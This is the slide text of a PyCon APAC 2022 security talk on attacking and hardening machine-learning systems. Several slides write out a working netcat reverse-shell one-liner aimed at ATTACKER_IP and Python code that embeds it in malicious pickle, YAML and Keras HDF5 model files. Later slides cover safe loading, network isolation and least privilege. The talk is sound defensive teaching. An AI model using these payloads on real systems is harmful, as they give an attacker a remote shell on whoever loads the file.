Slide 1

Slide 1 text

Hacking and Securing Machine Learning Environments and Systems Joshua Arvin Lat PyCon APAC 2022

Slide 2

Slide 2 text

➤ Chief Technology Officer of NuWorks Interactive Labs ➤ AWS Machine Learning Hero ➤ Author of 📖 Machine Learning with Amazon SageMaker Cookbook

Slide 3

Slide 3 text

Author of 📖 Machine Learning with Amazon SageMaker Cookbook 80 proven recipes for data scientists and developers to perform machine learning experiments and deployments

Slide 4

Slide 4 text

CYBERSECURITY ATTACK CHAIN

Slide 5

Slide 5 text

JUPYTER NOTEBOOK LIBRARIES, FRAMEWORKS, PACKAGES, AND DEPENDENCIES CUSTOM CODE DATASET INFRASTRUCTURE ML SERVICE

Slide 6

Slide 6 text

ML SERVICE CUSTOM CODE DOCKER CONTAINER IMAGE INFERENCE ENDPOINT CONFIGURATION MODEL ARTIFACTS

Slide 7

Slide 7 text

No content

Slide 8

Slide 8 text

REVERSE SHELL

Slide 9

Slide 9 text

nc -nvl 14344 ATTACKER MACHINE VICTIM MACHINE MALICIOUS FILE mkfifo /tmp/ABC; cat /tmp/ABC | /bin/sh -i 2>&1 | nc ATTACKER_IP 14344 > /tmp/ABC

Slide 10

Slide 10 text

PAYLOAD GENERATION

Slide 11

Slide 11 text

def generate_random_string(): list_of_chars = random.choices( string.ascii_uppercase, k=5) return ''.join(list_of_chars) def generate_payload(ip="127.0.0.1", port="14344"): r = "/tmp/" + generate_random_string() commands = [ f'rm {r}; mkfifo {r}; cat {r} ', f'/bin/sh -i 2>&1', f'nc {ip} {port} > {r} ' ] return ' | '.join(commands)

Slide 12

Slide 12 text

PAYLOAD = generate_payload() class SampleClass: def __reduce__(self): cmd = (PAYLOAD) return os.system, (cmd,) def generate_pickle(): obj = SampleClass() with open("model.pkl", "wb") as f: model = pickle.dump(obj, f)

Slide 13

Slide 13 text

MALICIOUS PICKLE FILES

Slide 14

Slide 14 text

python -m pickletools model.pkl 0: \x80 PROTO 3 2: c GLOBAL 'posix system' 16: q BINPUT 0 18: X BINUNICODE ' rm /tmp/UJTOU; mkfifo /tmp/UJTOU; cat /tmp/UJTOU | /bin/sh -i 2>&1 | nc 127.0.0.1 14344 > /tmp/UJTOU ' 123: q BINPUT 1 125: \x85 TUPLE1 126: q BINPUT 2 128: R REDUCE 129: q BINPUT 3 131: . STOP

Slide 15

Slide 15 text

def load_model(): model = None with open("model.pkl", "rb") as f: model = pickle.load(f) return model @app.route("/predict", methods=["POST"]) def predict(): model = load_model() # get input value from request # perform prediction return '', 200 import torch torch.load("model.pkl") import joblib joblib.load("model.pkl")

Slide 16

Slide 16 text

class RestrictedUnpickler(pickle.Unpickler): def find_class(self, module, name): SAFE_BUILTINS = {'range', 'complex', 'set'} if module == "builtins" and name in SAFE_BUILTINS: return getattr(builtins, name) raise pickle.UnpicklingError() with open("model.pkl", "rb") as f: model = RestrictedUnpickler(f).load() Load Pickle files securely?

Slide 17

Slide 17 text

MALICIOUS YAML FILES

Slide 18

Slide 18 text

import yaml import subprocess class Payload(object): def __reduce__(self): PAYLOAD = ' rm /tmp/FCMHH; mkfifo /tmp/FCMHH; cat /tmp/FCMHH | /bin/sh -i 2>&1 | nc 127.0.0.1 14344 > /tmp/FCMHH ' return (__import__('os').system,(PAYLOAD,)) def save_yaml(): with open(r'malicious.yaml', 'w') as file: yaml.dump(Payload(), file)

Slide 19

Slide 19 text

!!python/object/apply:posix.system - rm /tmp/FCMHH; mkfifo /tmp/FCMHH; cat /tmp/FCMHH | /bin/sh -i 2>&1 | nc 127.0.0.1 14344 > /tmp/FCMHH import yaml def load_yaml(filename): output = None with open(filename, 'r') as file: output = yaml.load(file, Loader=yaml.Loader) return output

Slide 20

Slide 20 text

import yaml def safely_load_yaml(filename): output = None with open(filename, 'r') as file: output = yaml.safe_load(file) return output Load YAML files securely?

Slide 21

Slide 21 text

MALICIOUS HDF5 FILES

Slide 22

Slide 22 text

def custom_layer(tensor): PAYLOAD = 'rm /tmp/FCMHH; mkfifo /tmp/FCMHH; cat /tmp/FCMHH | /bin/sh -i 2>&1 | nc 127.0.0.1 14344 > /tmp/FCMHH ' __import__('os').system(PAYLOAD) return tensor input_layer = Input(shape=(10), name="input_layer") lambda_layer = Lambda(custom_layer, name="lambda_layer")(input_layer) output_layer = Softmax(name="output_layer")(lambda_layer) model = Model(input_layer, output_layer, name="model") model.compile(optimizer=Adam(lr=0.0004), loss="categorical_crossentropy") model.save("model.h5")

Slide 23

Slide 23 text

from tensorflow.keras.models import load_model load_model("model.h5") MALICIOUS FILE

Slide 24

Slide 24 text

NETWORK ISOLATION

Slide 25

Slide 25 text

nc -nvl 14344 ATTACKER MACHINE VICTIM MACHINE MALICIOUS FILE

Slide 26

Slide 26 text

PRIVILEGE ESCALATION

Slide 27

Slide 27 text

IAM USER IAM ROLE NOTEBOOK INSTANCE PERMITTED TO ACCESS ? PERMITTED TO ACCESS OR PERFORM THE FOLLOWING ACTIONS from sagemaker import get_execution_role role = get_execution_role()

Slide 28

Slide 28 text

PRINCIPLE OF LEAST PRIVILEGE

Slide 29

Slide 29 text

ATTACKS ON DATA PRIVACY & MODEL PRIVACY

Slide 30

Slide 30 text

ATTACKS ON DATA PRIVACY & MODEL PRIVACY Model inversion attack Model extraction attack Membership inference attack Attribute inference attack De-anonynimization

Slide 31

Slide 31 text

ACCOUNT ACTION MONITORING

Slide 32

Slide 32 text

LAMBDA + SCIKIT-LEARN PREDICTION ENDPOINT API GATEWAY LAMBDA + TENSORFLOW PREDICTION ENDPOINT API GATEWAY LAMBDA + FB PROPHET PREDICTION ENDPOINT API GATEWAY

Slide 33

Slide 33 text

AUTOMATED VULNERABILITY MANAGEMENT

Slide 34

Slide 34 text

VULNERABILITY ASSESSMENT TOOL

Slide 35

Slide 35 text

Thanks